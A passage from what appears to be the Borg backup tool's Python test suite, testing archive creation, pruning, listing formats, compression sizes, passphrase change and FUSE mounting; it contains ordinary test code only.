assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
def test_create_topical(self):
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
# no listing by default
output = self.cmd('create', self.repository_location + '::test', 'input')
self.assert_not_in('file1', output)
# shouldn't be listed even if unchanged
output = self.cmd('create', self.repository_location + '::test0', 'input')
self.assert_not_in('file1', output)
# should list the file as unchanged
output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
self.assert_in('file1', output)
# should *not* list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
self.assert_not_in('file1', output)
# change the file
self.create_regular_file('file1', size=1024 * 100)
# should list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
from threading import Thread
def fifo_feeder(fifo_fn, data):
fd = os.open(fifo_fn, os.O_WRONLY)
try:
os.write(fd, data)
finally:
os.close(fd)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
data = b'foobar' * 1000
fifo_fn = os.path.join(self.input_path, 'fifo')
link_fn = os.path.join(self.input_path, 'link_fifo')
os.mkfifo(fifo_fn)
os.symlink(fifo_fn, link_fn)
t = Thread(target=fifo_feeder, args=(fifo_fn, data))
t.start()
try:
self.cmd('create', '--read-special', archive, 'input/link_fifo')
finally:
t.join()
with changedir('output'):
self.cmd('extract', archive)
fifo_fn = 'input/link_fifo'
with open(fifo_fn, 'rb') as f:
extracted_data = f.read()
assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere does not exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere does not exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=1')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supercede the latest checkpoint by a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
# Given a date and time in local tz, create a UTC timestamp string suitable
# for create --timestamp command line option
def _to_utc_timestamp(self, year, month, day, hour, minute, second):
dtime = datetime(year, month, day, hour, minute, second, 0, dateutil.tz.gettz())
return dtime.astimezone(dateutil.tz.UTC).strftime("%Y-%m-%dT%H:%M:%S")
def _create_archive_ts(self, name, y, m, d, H=0, M=0, S=0):
loc = self.repository_location + '::' + name
self.cmd('create', '--timestamp', self._to_utc_timestamp(y, m, d, H, M, S), loc, src_dir)
# This test must match docs/misc/prune-example.txt
def test_prune_repository_example(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Archives that will be kept, per the example
# Oldest archive
self._create_archive_ts('test01', 2015, 1, 1)
# 6 monthly archives
self._create_archive_ts('test02', 2015, 6, 30)
self._create_archive_ts('test03', 2015, 7, 31)
self._create_archive_ts('test04', 2015, 8, 31)
self._create_archive_ts('test05', 2015, 9, 30)
self._create_archive_ts('test06', 2015, 10, 31)
self._create_archive_ts('test07', 2015, 11, 30)
# 14 daily archives
self._create_archive_ts('test08', 2015, 12, 17)
self._create_archive_ts('test09', 2015, 12, 18)
self._create_archive_ts('test10', 2015, 12, 20)
self._create_archive_ts('test11', 2015, 12, 21)
self._create_archive_ts('test12', 2015, 12, 22)
self._create_archive_ts('test13', 2015, 12, 23)
self._create_archive_ts('test14', 2015, 12, 24)
self._create_archive_ts('test15', 2015, 12, 25)
self._create_archive_ts('test16', 2015, 12, 26)
self._create_archive_ts('test17', 2015, 12, 27)
self._create_archive_ts('test18', 2015, 12, 28)
self._create_archive_ts('test19', 2015, 12, 29)
self._create_archive_ts('test20', 2015, 12, 30)
self._create_archive_ts('test21', 2015, 12, 31)
# Additional archives that would be pruned
# The second backup of the year
self._create_archive_ts('test22', 2015, 1, 2)
# The next older monthly backup
self._create_archive_ts('test23', 2015, 5, 31)
# The next older daily backup
self._create_archive_ts('test24', 2015, 12, 16)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
# Prune second backup of the year
assert re.search(r'Would prune:\s+test22', output)
# Prune next older monthly and daily backups
assert re.search(r'Would prune:\s+test23', output)
assert re.search(r'Would prune:\s+test24', output)
# Must keep the other 21 backups
# Yearly is kept as oldest archive
assert re.search(r'Keeping archive \(rule: yearly\[oldest\] #1\):\s+test01', output)
for i in range(1, 7):
assert re.search(r'Keeping archive \(rule: monthly #' + str(i) + r'\):\s+test' + ("%02d" % (8-i)), output)
for i in range(1, 15):
assert re.search(r'Keeping archive \(rule: daily #' + str(i) + r'\):\s+test' + ("%02d" % (22-i)), output)
output = self.cmd('list', self.repository_location)
# Nothing pruned after dry run
for i in range(1, 25):
self.assert_in('test%02d' % i, output)
self.cmd('prune', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
output = self.cmd('list', self.repository_location)
# All matching backups plus oldest kept
for i in range(1, 22):
self.assert_in('test%02d' % i, output)
# Other backups have been pruned
for i in range(22, 25):
self.assert_not_in('test%02d' % i, output)
# With an initial and daily backup, prune daily until oldest is replaced by a monthly backup
def test_prune_retain_and_expire_oldest(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Initial backup
self._create_archive_ts('original_archive', 2020, 9, 1, 11, 15)
# Archive and prune daily for 30 days
for i in range(1, 31):
self._create_archive_ts('september%02d' % i, 2020, 9, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Archive and prune 6 days into the next month
for i in range(1, 7):
self._create_archive_ts('october%02d' % i, 2020, 10, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Oldest backup is still retained
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly\[oldest\] #1' + r'\):\s+original_archive', output)
# Archive one more day and prune.
self._create_archive_ts('october07', 2020, 10, 7, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Last day of previous month is retained as monthly, and oldest is expired.
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly #1\):\s+september30', output)
self.assert_not_in('original_archive', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=1')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
def test_prune_repository_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--prefix=foo-')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
output = self.cmd('list', self.repository_location)
self.assert_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--prefix=foo-')
output = self.cmd('list', self.repository_location)
self.assert_not_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
output = self.cmd('list', self.repository_location)
self.assert_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
output = self.cmd('list', self.repository_location)
self.assert_not_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
output_1 = self.cmd('list', self.repository_location)
output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
self.assertEqual(output_1, output_2)
output_1 = self.cmd('list', '--short', self.repository_location)
self.assertEqual(output_1, 'test-1\ntest-2\n')
output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
self.assertEqual(output_1, 'test-1/test-2/')
output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
self.assert_in('test-1 comment 1\n', output_3)
self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_consider_checkpoints(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test2.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
output = self.cmd('list', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" not in output
assert "test3.checkpoint.1" not in output
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" in output
assert "test3.checkpoint.1" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
def test_list_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
repository = list_repo['repository']
assert len(repository['id']) == 64
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert list_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in list_repo['encryption']
archive0 = list_repo['archives'][0]
assert datetime.strptime(archive0['time'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['size'] == 81920
assert datetime.strptime(file1['mtime'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
messages = {} # type -> message, one of each kind
for line in log.splitlines():
msg = json.loads(line)
messages[msg['type']] = msg
file_status = messages['file_status']
assert 'status' in file_status
assert file_status['path'].startswith('input')
log_message = messages['log_message']
assert isinstance(log_message['time'], float)
assert log_message['levelname'] == 'DEBUG' # there should only be DEBUG messages
assert isinstance(log_message['message'], str)
def test_debug_profile(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
stats = pstats.Stats('create.pyprof')
stats.strip_dirs()
stats.sort_stats('cumtime')
self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
stats = pstats.Stats('create.pyprof') # Only do this on trusted data!
stats.strip_dirs()
stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_zstd_compressible(self):
size, csize = self._get_sizes('zstd', compressible=True)
assert csize < size * 0.1
def test_compression_zstd_uncompressible(self):
size, csize = self._get_sizes('zstd', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_change_passphrase(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
# here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
self.cmd('key', 'change-passphrase', self.repository_location)
os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
os.close(os.open(some_file, flags_noatime))
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_test_files()
have_noatime = has_noatime('input/file1')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
os.remove(os.path.join('input', 'flagfile'))
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
with self.fuse_mount(self.repository_location, mountpoint):
# flags are not supported by the FUSE mount
# we also ignore xattrs here, they are tested separately
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
ignore_flags=True, ignore_xattrs=True)
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
ignore_flags=True, ignore_xattrs=True)
# mount only 1 archive, its contents shall show up directly in mountpoint:
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
ignore_flags=True, ignore_xattrs=True)
# regular file
in_fn = 'input/file1'
out_fn = os.path.join(mountpoint, 'input', 'file1')
# stat
sti1 = os.stat(in_fn)
sto1 = os.stat(out_fn)
assert sti1.st_mode == sto1.st_mode
assert sti1.st_uid == sto1.st_uid
assert sti1.st_gid == sto1.st_gid
assert sti1.st_size == sto1.st_size
if have_noatime:
assert sti1.st_atime == sto1.st_atime
assert sti1.st_ctime == sto1.st_ctime
assert sti1.st_mtime == sto1.st_mtime
if are_hardlinks_supported():
# note: there is another hardlink to this, see below
assert sti1.st_nlink == sto1.st_nlink == 2
# read
with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
assert in_f.read() == out_f.read()
# hardlink (to 'input/file1')
if are_hardlinks_supported():
in_fn = 'input/hardlink'
out_fn = os.path.join(mountpoint, 'input', 'hardlink')
sti2 = os.stat(in_fn)
sto2 = os.stat(out_fn)
assert sti2.st_nlink == sto2.st_nlink == 2
assert sto1.st_ino == sto2.st_ino
# symlink
if are_symlinks_supported():
in_fn = 'input/link1'
out_fn = os.path.join(mountpoint, 'input', 'link1')
sti = os.stat(in_fn, follow_symlinks=False)
sto = os.stat(out_fn, follow_symlinks=False)
assert sti.st_size == len('somewhere')
assert sto.st_size == len('somewhere')
assert stat.S_ISLNK(sti.st_mode)
assert stat.S_ISLNK(sto.st_mode)
assert os.readlink(in_fn) == os.readlink(out_fn)
# FIFO
if are_fifos_supported():
out_fn = os.path.join(mountpoint, 'input', 'fifo1')
sto = os.stat(out_fn)
assert stat.S_ISFIFO(sto.st_mode)
# list/read xattrs
try:
in_fn = 'input/fusexattr'
out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
assert xattr.getxattr(out_fn, b'user.empty') == b''
else:
assert no_selinux(xattr.listxattr(out_fn)) == []
try:
xattr.getxattr(out_fn, b'user.foo')
except OSError as e:
assert e.errno == llfuse.ENOATTR
else:
assert False, "expected OSError(ENOATTR), but no error was raised"
except OSError as err:
if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
# some systems have no xattr support on FUSE
pass
else:
raise
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive')
# Get rid of a chunk and repair it
archive, repository = self.open_archive('archive')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
path = item.path # store full path for later
break
else:
assert False # missed the file
repository.commit(compact=False)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
with pytest.raises(OSError) as excinfo:
open(os.path.join(mountpoint, path))
assert excinfo.value.errno == errno.EIO
with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_migrate_lock_alive(self):
"""Both old_id and new_id must not be stale during lock migration / daemonization."""
from functools import wraps
import pickle
import traceback
# Check results are communicated from the borg mount background process
# to the pytest process by means of a serialized dict object stored in this file.
assert_data_file = os.path.join(self.tmpdir, 'migrate_lock_assert_data.pickle')
# Decorates Lock.migrate_lock() with process_alive() checks before and after.
# (We don't want to mix testing code into runtime.)
def write_assert_data(migrate_lock):
@wraps(migrate_lock)
def wrapper(self, old_id, new_id):
wrapper.num_calls += 1
assert_data = {
'num_calls': wrapper.num_calls,
'old_id': old_id,
'new_id': new_id,
'before': {
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)},
'exception': None,
'exception.extr_tb': None,
'after': {
'old_id_alive': None,
'new_id_alive': None}}
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
try:
return migrate_lock(self, old_id, new_id)
except BaseException as e:
assert_data['exception'] = e
assert_data['exception.extr_tb'] = traceback.extract_tb(e.__traceback__)
finally:
assert_data['after'].update({
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)})
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
wrapper.num_calls = 0
return wrapper
# Decorate
borg.locking.Lock.migrate_lock = write_assert_data(borg.locking.Lock.migrate_lock)
try:
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('arch')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# In order that the decoration is kept for the borg mount process, we must not spawn, but actually fork;
# not to be confused with the forking in borg.helpers.daemonize() which is done as well.
with self.fuse_mount(self.repository_location, mountpoint, os_fork=True):
pass
with open(assert_data_file, 'rb') as _in:
assert_data = pickle.load(_in)
print('\nLock.migrate_lock(): assert_data = %r.' % (assert_data, ), file=sys.stderr, flush=True)
exception = assert_data['exception']
if exception is not None:
extracted_tb = assert_data['exception.extr_tb']
print(
'Lock.migrate_lock() raised an exception:\n',
'Traceback (most recent call last):\n',
